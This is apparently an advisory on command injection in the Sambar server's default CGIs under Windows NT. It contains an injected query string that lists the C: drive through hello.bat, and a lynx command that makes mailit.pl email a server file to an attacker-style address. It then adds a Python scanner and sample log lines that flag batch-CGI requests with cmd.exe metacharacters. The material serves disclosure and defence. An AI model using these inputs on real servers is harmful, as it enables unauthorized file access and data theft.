Vulnerability
Sambar
Affected
WinNT, 2000
Description
Georgi Chorbadzhiyski found the following. The default installation
of Sambar server puts two .BAT files, ECHO.BAT and HELLO.BAT, into
the server's /CGI-BIN/ directory. These are simple files with just
one "echo" command in them. However, under Windows NT these files
can cause a lot of trouble. The problem IMHO lies in CMD.EXE;
an example follows:
http://yourdomain/cgi-bin/hello.bat?&dir+c:\
You'll see a nice listing of your C: drive. Sambar server runs
with Administrator privileges under NT, so even if you use NTFS,
you will still be affected. This bug was discovered by Georich
Chorbadzhiyski and Nikolay Tsvetkov.
This is not the only problem with the default CGIs included with
Sambar 4.2. Try this:
echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl
Solution
Sambar server running on Windows 95/98 is _NOT_ vulnerable.
As a solution, delete any .BAT files in the /CGI-BIN/ directory of
your Sambar server.
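To check a server for this problem, the following added example (not
part of the original advisory or of Sambar) lists batch files left in
a CGI directory and flags access-log requests that call a batch CGI
with CMD.EXE metacharacters in the query string. The Common Log Format
layout and the sample log lines are assumptions constructed for
illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Characters cmd.exe treats as command separators or redirection.
CMD_META = set("&|<>^")
BATCH_EXT = (".bat", ".cmd")

# Assumption: Common Log Format; only the quoted request line is parsed.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+)(?: HTTP/[\d.]+)?"')

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/hello.bat HTTP/1.0" 200 120',
    '192.0.2.11 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/hello.bat?&dir+c:\\ HTTP/1.0" 200 2048',
    '192.0.2.12 - - [01/Jan/2000:10:00:09 +0000] "GET /CGI-BIN/ECHO.BAT?%26dir HTTP/1.0" 200 90',
    '192.0.2.13 - - [01/Jan/2000:10:00:12 +0000] "GET /index.htm?a=1&b=2 HTTP/1.0" 200 512',
]

def batch_cgis(cgi_dir):
    """Return the batch files present in a CGI directory (to be deleted)."""
    return sorted(p.name for p in Path(cgi_dir).iterdir()
                  if p.is_file() and p.suffix.lower() in BATCH_EXT)

def suspicious_request(line):
    """Return the decoded query if a batch CGI is requested with metacharacters."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    path = unquote(path).lower()          # Windows paths are case-insensitive
    if "/cgi-bin/" not in path or not path.endswith(BATCH_EXT):
        return None
    # Decode '+' and %XX first so an encoded '&' is also caught.
    decoded = unquote(query.replace("+", " "))
    return decoded if CMD_META & set(decoded) else None

def scan(lines):
    """Return (client address, decoded query) for every flagged request."""
    return [(ln.split()[0], q) for ln in lines if (q := suspicious_request(ln))]

if __name__ == "__main__":
    for client, query in scan(SAMPLE_LOG):
        print(f"{client}: batch CGI called with {query!r}")
```

Any '&' in a query sent to a batch CGI is flagged, including an
ordinary parameter separator, since the whole string reaches CMD.EXE.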